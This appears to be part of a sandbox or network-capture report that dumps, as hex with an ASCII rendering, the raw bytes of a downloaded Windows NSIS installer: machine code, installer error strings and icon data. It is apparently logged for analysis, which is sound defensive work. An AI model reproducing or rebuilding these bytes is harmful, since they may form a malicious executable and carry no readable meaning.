                                                                                              2021-12-07 12:39:07 UTC1719INData Raw: 7a 28 7b 2e ab 27 6f 2c 6f 09 cd 79 a8 dc 84 9c d7 cb 8f cb 4f cb 7f 86 86 df 48 d1 4d 31 50 31 53 31 4f f1 48 f1 0c 7a 49 67 68 86 fe ca 07 c8 ef b9 92 a3 fa 48 25 55 c5 a9 c6 a8 72 55 db 54 17 d0 fe 0e ea d6 ea 74 f5 3b 9a 26 9a 4e 9a 40 cd 54 a6 dd b9 0e f4 bc 59 97 cb e3 4a a1 57 05 70 87 72 93 e8 b6 9f c9 fd 12 3a 75 3b 9e 9a b7 96 bf 9f ff 27 bf 31 34 e6 8e 82 08 c1 79 81 93 b0 b5 f0 23 21 4f 18 28 8c 16 7e 8c 95 c1 5c cc 4f 2b 84 a7 31 8a 48 44 49 a2 4c 8c 81 7e e2 44 c8 78 84 44 27 19 25 59 28 89 94 66 48 33 a5 2b a4 1b a5 db d0 ba 2d 50 d3 58 8c 7f 0b d1 b6 8e 72 99 3c 1c 2d fa 5c 6e 54 94 29 ba 28 25 ca be e0 a2 79 aa bd aa 62 55 5b 75 67 68 53 4d 34 1f 69 e4 9a e7 b8 bc da 01 f7 56 43 ef e4 36 e2 b5 e4 d5 e1 87 f2 07 f0 c7 43 b3 6f 8c 99 62 93
                                                                                              Data Ascii: z({.'o,oyOHM1P1S1OHzIghH%UrUTt;&N@TYJWpr:u;'14y#!O(~\O+1HDIL~DxD'%Y(fH3+-PXr<-\nT)(%ybU[ughSM4iVC6Cob
                                                                                              2021-12-07 12:39:07 UTC1727INData Raw: 15 18 70 40 00 56 8b f8 ff 15 1c 70 40 00 eb 1f 6a 22 e8 18 07 00 00 8b 4d ec 83 e1 02 51 50 ff 75 e0 e8 fd 07 00 00 50 e8 42 07 00 00 8b f8 3b fb 0f 84 8d 05 00 00 e9 59 03 00 00 50 e8 e2 07 00 00 8b 75 ec 8b f8 8b 45 f0 6a 02 89 45 d0 e8 db 06 00 00 6a 11 89 45 bc e8 d1 06 00 00 8d 4d 08 53 51 8b 0d 10 ec 42 00 83 c9 02 53 51 53 53 53 50 57 c7 45 fc 01 00 00 00 ff 15 20 70 40 00 85 c0 0f 85 3c 05 00 00 83 fe 01 bf 78 a3 40 00 75 0e 6a 23 e8 96 06 00 00 57 e8 e9 35 00 00 40 83 fe 04 75 0e 6a 03 e8 66 06 00 00 56 a3 78 a3 40 00 58 83 fe 03 75 0f 68 00 0c 00 00 57 53 ff 75 e8 e8 c4 0a 00 00 50 57 ff 75 d0 53 ff 75 bc ff 75 08 ff 15 04 70 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 ce 00 00 00 68 19 00 02 00 e8 47 07 00 00 6a 33 8b f8 e8 34 06 00 00 3b fb 88 1e
                                                                                              Data Ascii: p@Vp@j"MQPuPB;YPuEjEjEMSQBSQSSSPWE p@<x@uj#W5@ujfVx@XuhWSuPWuSuup@u]uhGj34;
                                                                                              2021-12-07 12:39:07 UTC1734INData Raw: 00 c7 45 0c 0f 04 00 00 3d e9 03 00 00 0f 85 a4 00 00 00 6a 07 33 c0 59 8d 7d bc ff 75 fc f3 ab 8b 45 08 bf d8 9f 42 00 68 a8 93 42 00 89 45 b8 89 7d c0 c7 45 cc 50 44 40 00 89 75 d0 e8 12 17 00 00 89 45 c4 8d 45 b8 50 c7 45 c8 41 00 00 00 ff 15 54 71 40 00 85 c0 74 56 50 ff 15 78 72 40 00 56 e8 be 11 00 00 a1 70 eb 42 00 8b 80 1c 01 00 00 85 c0 74 28 81 fe 00 44 43 00 75 20 50 6a 00 e8 ce 16 00 00 57 bf 00 db 42 00 57 ff 15 f0 70 40 00 85 c0 74 07 57 56 e8 b0 16 00 00 ff 05 c4 9f 42 00 56 53 ff 75 08 e8 23 0f 00 00 eb 07 c7 45 0c 0f 04 00 00 81 7d 0c 0f 04 00 00 74 0d 81 7d 0c 05 04 00 00 0f 85 75 01 00 00 83 65 fc 00 83 65 f8 00 56 53 e8 fb 0e 00 00 56 e8 24 12 00 00 85 c0 75 07 c7 45 fc 01 00 00 00 bf a0 8f 42 00 56 57 e8 39 16 00 00 33 db 53 e8 4f 19
                                                                                              Data Ascii: E=j3Y}uEBhBE}EPD@uEEPEATq@tVPxr@VpBt(DCu PjWBWp@tWVBVSu#E}t}ueeVSV$uEBVW93SO
                                                                                              2021-12-07 12:39:07 UTC1742INData Raw: 51 50 89 45 f8 50 6a 13 8d 46 0c 6a 13 50 c7 07 07 00 00 00 e8 c8 06 00 00 85 c0 75 12 39 07 74 0e 21 46 08 c7 06 0d 00 00 00 e9 1d 01 00 00 c7 06 11 00 00 00 e9 c4 05 00 00 8b 86 0c 05 00 00 eb 20 83 7d cc 00 0f 84 c2 05 00 00 8b 4d c8 ff 4d cc 0f b6 11 8b cb d3 e2 09 55 c0 ff 45 c8 83 c3 08 3b d8 72 dc 0f b7 04 45 40 93 40 00 23 45 c0 8b 8e 10 05 00 00 8d 04 81 0f b6 50 01 0f b7 40 02 83 f8 10 89 45 ec 73 16 8b ca 2b da d3 6d c0 8b 4e 08 89 44 8e 0c ff 46 08 e9 ac 00 00 00 83 f8 12 75 0c 6a 07 c7 45 f8 0b 00 00 00 58 eb 2c 83 c0 f2 c7 45 f8 03 00 00 00 eb 20 83 7d cc 00 0f 84 47 05 00 00 8b 4d c8 ff 4d cc 0f b6 39 8b cb d3 e7 09 7d c0 ff 45 c8 83 c3 08 8d 0c 10 3b d9 72 d9 8b ca 2b da d3 6d c0 0f b7 0c 45 40 93 40 00 23 4d c0 8b 55 f8 2b d8 03 d1 8b c8
                                                                                              Data Ascii: QPEPjFjPu9t!F }MMUE;rE@@#EP@Es+mNDFujEX,E }GMM9}E;r+mE@@#MU+
                                                                                              2021-12-07 12:39:07 UTC1750INData Raw: 77 6e 6c 6f 61 64 20 61 6e 64 20 64 61 6d 61 67 65 64 20 6d 65 64 69 61 2e 20 43 6f 6e 74 61 63 74 20 74 68 65 0a 69 6e 73 74 61 6c 6c 65 72 27 73 20 61 75 74 68 6f 72 20 74 6f 20 6f 62 74 61 69 6e 20 61 20 6e 65 77 20 63 6f 70 79 2e 0a 0a 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 74 3a 0a 68 74 74 70 3a 2f 2f 6e 73 69 73 2e 73 66 2e 6e 65 74 2f 4e 53 49 53 5f 45 72 72 6f 72 00 45 72 72 6f 72 20 6c 61 75 6e 63 68 69 6e 67 20 69 6e 73 74 61 6c 6c 65 72 00 00 00 2e 2e 2e 20 25 64 25 25 00 00 00 00 53 65 53 68 75 74 64 6f 77 6e 50 72 69 76 69 6c 65 67 65 00 7e 6e 73 75 2e 74 6d 70 00 00 00 00 5c 54 65 6d 70 00 00 00 4e 53 49 53 20 45 72 72 6f 72 00 00 45 72 72 6f 72 20 77 72 69 74 69 6e 67 20 74 65 6d 70 6f 72 61 72 79 20 66 69 6c 65 2e 20 4d 61
                                                                                              Data Ascii: wnload and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_ErrorError launching installer... %d%%SeShutdownPrivilege~nsu.tmp\TempNSIS ErrorError writing temporary file. Ma
                                                                                              2021-12-07 12:39:07 UTC1758INData Raw: 00 00 00 00 00 00 01 00 00 00 28 00 00 00 8f 00 00 00 eb 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 04 00 03 ff 0f 00 0b fe 21 01 18 ff 34 03 26 ff 45 04 33 ff 53 05 3e fe 56 06 41 ff 57 07 42 ff 59 07 43 ff 59 08 44 fe 5a 08 45 ff 5b 08 46 ff 5c 09 47 ff 5c 09 47 fe 5d 09 48 ff 5e 0a 49 ff 5e 0a 49 ff 5e 0a 49 fe 5e 0a 49 ff 5e 0a 49 ff 5e 0a 49 ff 5d 09 49 fe 5d 09 48 ff 5c 09 47 ff 5b 08 46 ff 5b 08 45 fe 5a 08 44 ff 59 07 43 ff 58 07 43 ff 57 06 41 fe 54 05 3e ff 45 04 33 ff 34 03 27 ff 21 02 18 fe 0f 00 0b ff 04 00 03 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 eb 00 00 00 8f 00 00 00 28 00 00 00 01 00 00 00 00
                                                                                              Data Ascii: (!4&E3S>VAWBYCYDZE[F\G\G]H^I^I^I^I^I^I]I]H\G[F[EZDYCXCWAT>E34'!(
                                                                                              2021-12-07 12:39:07 UTC1766INData Raw: 00 00 c5 00 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 a9 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 05 00 04 fe 4c 0b 3b ff 6b 12 54 ff 70 16 59 ff 75 19 5f fe 7a 1d 64 ff 7f 21 69 ff 83 25 6e ff 87 28 72 fe 8b 2b 76 ff 8f 2e 7a ff 91 31 7d ff 95 34 80 fe 97 37 83 ff 99 39 86 ff 9c 3b 88 ff 9d 3d 8a fe 9f 3e 8b ff a0 40 8d ff a1 41 8e ff a2 42 8f fe a3 42 90 ff a4 43 90 ff a5 44 91 ff a5 45 92 fe a6 46 93 ff a7 46 94 ff a8 47 94 ff a8 48 95 fe
                                                                                              Data Ascii: L;kTpYu_zd!i%n(r+v.z1}479;=>@ABBCDEFFGH
                                                                                              2021-12-07 12:39:07 UTC1773INData Raw: 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 07 04 06 fe 15 0c 14 fe 4b 2b 44 fe 95 57 88 fe d6 7d c5 fe e3 84 d0 fe e4 85 d1 fe e3 84 d0 fe e4 85 d1 fe e4 85 d1 fe e4 85 d1 fe e3 84 d0 fe e4 85 d1 fe e4 85 d1 fe e6 87 d3 fe e4 85 d1 fe e1 82 ce fe dc 7d c9 fe d6 77 c3 fe cf 6f bb fe c8 68 b5 fe c6 66 b3 fe c6 66 b2 fe c5 65 b1 fe c4 64 b1 fe c3 63 b0 fe c2 63 af fe c1 61 ae fe c1 61 ad fe c0 60 ac fe bf 5f ab fe be 5e aa fe bd 5d a9 fe bb 5b a8 fe ba 5a a7 fe b9 59 a6 fe b8 58 a5 fe b7 57 a3 fe b5 55 a1 fe b2 51 9e fe af 4d 9a fe ab 49 96 fe a6 45 91 fe a1 40 8b fe 9b 39 85 fe 95 33 7e fe 8e 2c 77 fe 87 25 6f fe 7f 1e 67 fe 44 0d 36 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: K+DW}}wohffedccaa`_^][ZYXWUQMIE@93~,w%ogD6>
                                                                                              2021-12-07 12:39:07 UTC1781INData Raw: 67 b5 fe ca 6b b7 fe cc 6c b9 fe cd 6e ba fe ce 6f bb fe cf 71 bc fe d0 72 bd fe d1 73 be fe d2 74 bf fe d3 75 c0 fe d4 75 c1 fe d5 76 c1 fe d5 77 c2 fe d6 78 c3 fe d7 78 c4 fe d7 79 c4 fe db 7d c8 fe e0 82 cd fe e4 85 d1 fe de 7f cb fe d1 72 be fe d1 72 be fe d1 72 be fe d1 71 be fe cf 70 bb fe 3a 1f 34 fe 00 00 00 fe 7e 7b 70 fe cd cb bf fe de dd d5 fe e6 e5 df fe eb ea e6 fe ef ef eb fe ef f1 eb fe 7d bf 54 fe 3c a2 00 fe 26 c4 4a fe 1f e2 91 fe 1a e1 8e fe 18 e1 8d fe 42 e7 a2 fe 2b e4 97 fe 45 e7 a3 fe 47 e7 a4 fe 4c e8 a7 fe 4d e8 a7 fe 4a df a1 fe 44 cb 93 fe 44 cc 93 fe 4a df a1 fe 4d e8 a7 fe 4c e8 a7 fe 47 e7 a4 fe 44 e7 a3 fe 2b e4 97 fe 42 e7 a2 fe 18 e1 8d fe 1a e1 8e fe 1f e2 91 fe 26 c4 4a fe 3c a2 00 fe 80 c2 58 fe fb fd f9 fe fd fd fd fe
                                                                                              Data Ascii: gklnoqrstuuvwxxy}rrrqp:4~{p}T<&JB+EGLMJDDJMLGD+B&J<X
                                                                                              2021-12-07 12:39:07 UTC1789INData Raw: 88 d1 ff e3 87 d1 ff e2 87 d1 ff e1 87 d0 fe e1 86 d0 ff e1 86 d0 ff e0 85 cf ff e0 84 cf fe df 84 ce ff df 84 cd ff de 83 cd ff dc 81 ca fe d9 7d c7 ff d5 74 c1 ff d1 6d bc ff cb 66 b6 fe c5 5e ae ff be 55 a7 ff b6 4b 9e ff ae 40 95 fe a5 35 8a ff 5e 19 4d ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 d9 00 00 00 fe 00 00 00 fe 00 00 00 fe 28 0a 21 fe 9e 2f 83 fe ab 3c 91 fe b3 47 9a fe bb 51 a3 fe c2 5a ab fe c9 63 b3 fe cf 6a b9 fe d3 71 bf fe d7 7a c5 fe da 80 c9 fe dd 83 cc fe de 84 cd fe df 85 ce fe e0 85 ce fe e0 86 cf fe e1 86 d0 fe e1 87 d0 fe e1 87 d0 fe e2 88 d1 fe e2 88 d1 fe e3 89 d2 fe
                                                                                              Data Ascii: }tmf^UK@5^M4(!/<GQZcjqz
                                                                                              2021-12-07 12:39:07 UTC1797INData Raw: 25 54 ff 07 02 06 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 01 01 01 ff 0c 0c 0b ff 2e 2d 28 fe 4f 4d 45 ff 69 66 5d ff 79 76 6c ff 7a 77 6d fe 7a 78 6e ff 7b 78 6e ff 6b 69 60 ff 53 51 4a fe 31 2f 2b ff 0d 0d 0c ff 01 01 01 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 07 02 06 ff 60 25 54 fe 9d 3d 89 ff 9f 3e 8b ff 9f 3e 8b ff 9f 3e 8b fe a2 42 8e ff d0 77 bf ff e9 96 d9 ff e9 9b db fe ea 9f dc ff ea 9f dd ff e9 9f dc ff e8 9e dc fe e9 9e dc ff e9 9e dc ff e8 9e db ff e7 9d da fe e5 9a d8 ff e2 98 d6 ff e0 94 d3 ff dc 90 d0 fe d8 80 c7 ff d3 6c bd ff ce 64 b7 ff c9 5d b1 fe c3 55 aa ff bc 4c a2 ff b6 43 9b ff ae 38 91 fe 60 1b 4f ff 01 00 01 ff 00 00 00 ff 00 00 00 fe
                                                                                              Data Ascii: %T.-(OMEif]yvlzwmzxn{xnki`SQJ1/+`%T=>>>Bwld]ULC8`O
                                                                                              2021-12-07 12:39:07 UTC1805INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 00 00 00 f7 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 36 16 2f ff a7 4f 95 ff d0 70 bd fe e2 83 cf ff d5 75 c1 ff 50 29 47 ff 00 00 00 fe 00 00 00 ff 0a 02 08 ff 4b 16 3e ff 98 2f 7f fe b3 3b 96 ff b7 41 9b ff bb 46 9f ff be 4c a4 fe c2 51 a8 ff c5 55 ac ff c8 5a af ff ca 5d b2 fe cd 61 b5 ff cf 64 b8 ff d1 67 ba ff d3 6a bc fe d5 6d bf ff d7 6f c0 ff d8 71 c2 ff d9 77 c5 fe db 81 c9 ff dc 88 cc ff dd 94 d2 ff de 9d d5 fe df a5 d8 ff df a8 da ff e0 af dc ff e0 b2 dd fe
                                                                                              Data Ascii: _6/OpuP)GK>/;AFLQUZ]adgjmoqw
                                                                                              2021-12-07 12:39:07 UTC1812INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 1e 00 00 00 5b 00 00 00 8d 00 00 00 9c 00 00 00 9a 00 00 00 86 00 00 00 53 00 00 00 1e 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: [S
                                                                                              2021-12-07 12:39:07 UTC1820INData Raw: c0 e1 46 ed 1b 0a e0 c2 3c 80 ce d5 e2 64 89 a4 2b ec 21 49 12 63 8c 41 6a 89 2e b9 6f b9 ab 2b ec 5e cc ad bf d1 85 07 90 a6 a4 69 6a d2 34 65 68 ea 0c 6f 8c bd 4e 63 69 7e b7 fc ff 13 2c c1 e5 2a e0 e7 81 7b 81 1b d7 f8 ac 6b 49 c2 8a c7 6b aa 9d 81 68 ab d9 1c ed a4 27 ec a3 33 e8 a5 2b e8 a5 cd ef a4 ea b5 d1 15 f4 20 85 34 42 3a e1 76 ee aa dd b3 d9 e6 15 26 53 00 05 1c 52 3c cf 19 b6 96 8f 62 8c fd 61 cf 99 d5 0a 41 d8 41 bb e9 28 5e 60 6c 46 c5 18 cc f9 e6 38 f3 c9 2c b3 f1 14 93 cd 71 a6 9a e3 4c 34 ce 31 54 3f c9 68 fd 8c 99 4b 67 de d2 f7 5f e5 78 87 3b ff f7 01 2f 00 4f 3b cf e0 25 e0 93 b4 16 6d e5 af 6f a4 75 de 9c 38 c8 f0 f4 10 9b da b7 64 7b c2 68 ed 32 01 5a 59 e1 4f 65 39 0c 28 9d 1d 93 1b 99 4c 01 74 45 3d 66 8d b0 ca b8 fd d1 cd 45 d8
                                                                                              Data Ascii: F<d+!IcAj.o+^ij4ehoNci~,*{kIkh'3+ 4B:v&SR<baAA(^`lF8,qL41T?hKg_x;/O;%mou8d{h2ZYOe9(LtE=fE
                                                                                              2021-12-07 12:39:07 UTC1828INData Raw: 8a ea a6 22 af 2f 85 2a 7a f4 e5 e3 b6 9c ad 97 a2 85 3c 77 21 d6 d9 68 30 49 61 f5 75 0a cd 46 cc f0 e9 11 5e fc d1 7e e6 66 e6 16 bb c0 6b 14 f3 58 01 6b ea 06 8d b4 ce d8 c2 30 47 66 0e 71 68 f2 15 c6 ea 23 ef 9c 95 10 1e 3d 51 3f 7b 3b af e6 d2 f6 cb e8 ab 6c 22 54 11 81 0c f3 d1 59 2b 7d be e5 3e 7f ad bd c6 0d b7 5e c3 a6 ed 03 04 51 50 70 07 94 0b 0f 2e 94 3f 50 84 54 2c 21 0d e9 ac 29 a9 76 b4 68 4d 73 4e 33 37 62 e9 c4 da b9 fd 19 36 50 0e 03 8a b4 60 4a 5a 64 06 5c 96 20 e1 f9 b1 ef f1 f5 a1 cf b4 f4 1e 5c 63 fd 08 db c4 e6 d0 86 02 58 ba fa 81 7f 03 fc c6 7a 62 cc ee 60 80 8f 6c fe 65 73 73 ff dd c2 f3 bc 5c f0 3d df cb dd fe 0c e4 2b 90 7f d5 d2 c4 53 f9 d2 84 9d 4a 54 fb 6d 53 8e a2 35 77 1e ef b7 e4 f9 59 34 71 77 49 c7 9d 15 62 58 63 4a 6e
                                                                                              Data Ascii: "/*z<w!h0IauF^~fkXk0Gfqh#=Q?{;l"TY+}>^QPp.?PT,!)vhMsN37b6P`JZd\ \cXzb`less\=+SJTmS5wY4qwIbXcJn
                                                                                              2021-12-07 12:39:07 UTC1836INData Raw: e3 d8 a3 bb 3b 71 7c 97 11 c6 9f 79 7d b0 8b 90 95 19 8d 73 d1 10 14 b4 1c 85 f1 15 c6 c4 5d 2b 30 5a d0 96 41 8b 46 1b 2b fc 7f a3 d1 81 c1 b2 54 d2 1a 6c 96 f7 f1 f0 be 47 b9 7e f5 0d 7a 66 6c 89 3f 0f 7c 06 f8 e7 ff 25 38 80 79 42 19 a3 b1 fd f4 33 8d fb 38 d2 38 1d d2 57 b3 53 7c 56 81 cd 66 a5 51 2e 8e fe 4a 87 20 8b b6 d2 96 d6 a0 8c 47 da 96 52 f9 b2 7f 28 35 54 44 86 13 81 24 93 0e 47 3f b2 b5 b1 4d b7 d3 cb 2c 0c 19 f4 00 82 70 65 fb 22 2f ad 3c 4f 20 83 29 5c b5 5e e7 a7 3e f9 73 9c 3c 7d 9a 4a 25 ed f3 bb 8e 83 63 d9 d8 91 a2 91 ad 33 d3 8e 19 e3 57 0a 56 bd 2d 7e fb d2 97 f8 ad cb 7f c6 a6 b7 1b 45 b0 d8 c0 05 47 0b b6 0e 17 60 94 b4 8b 67 3c fc e8 58 1c 6d 31 57 9a a0 e3 ef 26 cf 4d 3a 95 90 78 e3 87 24 25 5b 59 cc 96 27 e8 04 ed 68 89 61 b8
                                                                                              Data Ascii: ;q|y}s]+0ZAF+TlG~zfl?|%8yB388WS|VfQ.J GR(5TD$G?M,pe"/<O )\^>s<}J%c3WV-~EG`g<Xm1W&M:x$%[Y'ha
                                                                                              2021-12-07 12:39:07 UTC1844INData Raw: 94 0d 90 0c 66 90 03 1a 15 c6 98 e4 02 8c 5c 28 c1 60 a7 c2 71 4b 4c 4d cf 44 e3 bd 56 ae fb 41 6e 39 4f 4a 06 d9 f2 5b 6c 7b 69 4b 6e ca f5 10 3c ba 66 8b 9a 3d c1 a4 33 43 59 57 06 ba 11 f1 34 5d 6f ab c7 b5 e7 56 52 a0 a6 d9 a4 d5 6a 0d 05 fd e2 94 7e 66 66 86 72 b9 fc a6 1c 40 b3 d9 c4 f7 7d 5a ad 16 cd 66 93 dd dd 90 fc 74 ed b9 15 7a 5b 3d f4 81 3a 5a 69 26 dc 89 a8 03 95 1a 52 cf 74 d8 f2 d6 e8 06 db 08 7d a6 dc d4 38 36 fb bb 6c f5 77 13 19 f1 84 69 a7 32 cc 3a 95 9d 9c d3 cc ce cf 53 2a 97 f3 5b 84 46 ec 69 cc eb f8 47 d7 76 4c 01 59 24 fc 14 7f 60 54 17 20 bb 83 32 fb 33 d9 b2 26 0c 34 d9 03 96 21 06 4f 7e 7b 33 0c 70 46 94 82 c3 95 93 58 ca 1e e7 00 ac c8 66 0f 01 e7 de aa 03 38 0c 8c 0d 19 ae 72 39 18 d5 ff 5a e7 5b 7c 39 09 2f 95 ca 75 66 51
                                                                                              Data Ascii: f\(`qKLMDVAn9OJ[l{iKn<f=3CYW4]oVRj~ffr@}Zftz[=:Zi&Rt}86lwi2:S*[FiGvLY$`T 23&4!O~{3pFXf8r9Z[|9/ufQ
                                                                                              2021-12-07 12:39:07 UTC1852INData Raw: c1 14 32 af 66 a7 93 8c c1 18 8d 56 12 5e 88 08 a8 53 a2 b0 6d 0b 3b d2 ca 1b 01 01 24 8f 99 da 3e de 79 fc bd 3c 7d f9 49 96 b7 af 23 22 5c ba 70 9e 6f 3c fe 38 33 9f fa 14 25 c7 c5 b5 6d 1c cb 4e 76 07 48 c6 19 c6 65 81 44 38 c8 e1 ea 1c ff e2 ae 5f a2 6f 7e 93 6f ae bc 10 12 8d 5a 15 fe e4 fc 22 3b 7d 9b 87 17 37 a8 bb 01 9a 70 57 40 db 5c 41 54 07 0b 70 94 8d a5 14 1d b3 84 a8 2e 1a 0b ad 20 60 37 74 00 04 28 65 a2 53 d0 c1 d0 27 60 17 4b 95 c2 f3 40 97 9e 2c 51 d1 f3 38 ca 8e dc 7c 87 b6 b9 82 ab 26 a2 e7 3c 76 3d 9b ef dc 68 f2 f8 e5 59 d6 bb 29 31 e7 7d 73 6f e7 5f dd f7 cb 1c a9 2f 0c 31 fe c2 20 78 a4 39 d8 f7 7c ba bd 1e db 3b 3b 7c e9 8b 5f e0 dc 2b 2f 27 c6 39 db 98 e7 1d 47 1e 66 aa d2 1c 79 fe 73 37 b6 65 61 45 e5 d6 80 d2 b0 c9 06 25 95 4f
                                                                                              Data Ascii: 2fV^Sm;$>y<}I#"\po<83%mNvHeD8_o~oZ";}7pW@\ATp. `7t(eS'`K@,Q8|&<v=hY)1}so_/1 x9|;;|_+/'9Gfys7eaE%O
                                                                                              2021-12-07 12:39:07 UTC1859INData Raw: 18 2c d1 a7 b0 ef 82 ee 8f 28 42 24 22 5c b1 fe 2a bc 65 ef 4f e1 9d 37 bf 97 37 af db 8a e1 fa 48 6e 2a f1 fc 7f be 62 f0 2b 28 65 75 08 1e d7 9f 66 c1 9f 24 29 4b 29 73 e6 a3 81 c2 af d4 b7 df 3b cd 39 74 08 2e fc 1e de 5f a9 03 08 97 78 7a 00 1f 3b de 5f 7a 8a 45 83 f2 2b a5 d8 02 7d ae e4 77 e5 bf 34 f7 4b 34 e4 0a ce 74 4e a0 cd cd 5e ef df 7d e8 c3 d0 b7 df 23 28 7f bd 17 c0 df 78 1f f3 c2 81 3c 1e 4d e1 75 e3 3f 83 6d 43 57 a1 16 c7 1c c7 31 69 2a 4a 2f c5 b4 bf 47 d6 17 3f 8a c9 7c ad b9 6a a3 62 33 bf 98 48 50 14 51 46 bf 91 c8 58 03 c3 c3 3b 0c 81 3c 80 ce dc 0f 43 74 07 f7 65 bf 67 f3 e6 8e da cb 28 3e cb 31 04 46 1a de d7 44 c4 71 1c 53 cd 0c e8 44 86 76 13 91 b0 66 9f 2c 84 20 47 1f 7a 66 95 fd c3 60 bd ef ef a4 1d 3c 33 fd 24 be fd cc 7d 78
                                                                                              Data Ascii: ,(B$"\*eO77Hn*b+(euf$)K)s;9t._xz;_zE+}w4K4tN^}#(x<Mu?mCW1i*J/G?|jb3HPQFX;<Cteg(>1FDqSDvf, Gzf`<3$}x
                                                                                              2021-12-07 12:39:07 UTC1867INData Raw: 6b 44 80 3c 79 31 42 47 de e7 d7 02 d8 fb 09 ed 74 09 27 e6 bf 8b d3 8b 0f 43 a9 55 c4 c4 18 a9 81 27 87 88 26 07 09 13 c3 a3 98 9c dc 83 a9 8d b7 61 74 dd f5 18 5e b7 1b b5 81 0d 17 65 18 28 69 cf a2 b9 74 00 2b 8b 4f 63 fe ec c3 98 5f 78 1a 8b 8d 15 2c b6 98 17 9a 4c ab 89 6e 11 44 34 82 cd eb 6e c5 8e a9 37 a0 1e 8f 57 80 80 41 22 e8 af 02 28 59 d5 65 4b 7c 66 3d ae 0c 5f de 6b 44 3e ca de 1f 18 7a 04 96 de 59 02 08 5a 00 57 09 b8 0a 20 7f fa 77 54 0b 27 93 43 fc 5c e7 29 5a e1 c5 7e 5f df 0e 80 cf 98 8a f7 cc e5 10 74 97 db 92 b9 ab 00 fc 4f 46 0c 51 ef e7 03 3a 48 c3 b4 b3 76 3d 76 d6 f6 60 48 0c 9b 93 de b6 01 16 03 c8 f4 03 5e f0 83 48 fb 09 38 83 4d ca bb e9 98 04 10 c8 85 45 4e 27 00 ca 89 87 c2 04 60 89 7e f2 11 7c 9f c7 a7 1c 1b 18 20 fd 0c 10
                                                                                              Data Ascii: kD<y1BGt'CU'&at^e(it+Oc_x,LnD4n7WA"(YeK|f=_kD>zYZW wT'C\)Z~_tOFQ:Hv=v`H^H8MEN'`~|
                                                                                              2021-12-07 12:39:07 UTC1875INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 39 00 00 00 7d 00 00 00 bf 00 00 00 ec 00 00 00 fb 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fb 00 00 00 ec 00 00 00 bf 00 00 00 7d 00 00 00 39 00 00 00 04 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: 9}}9
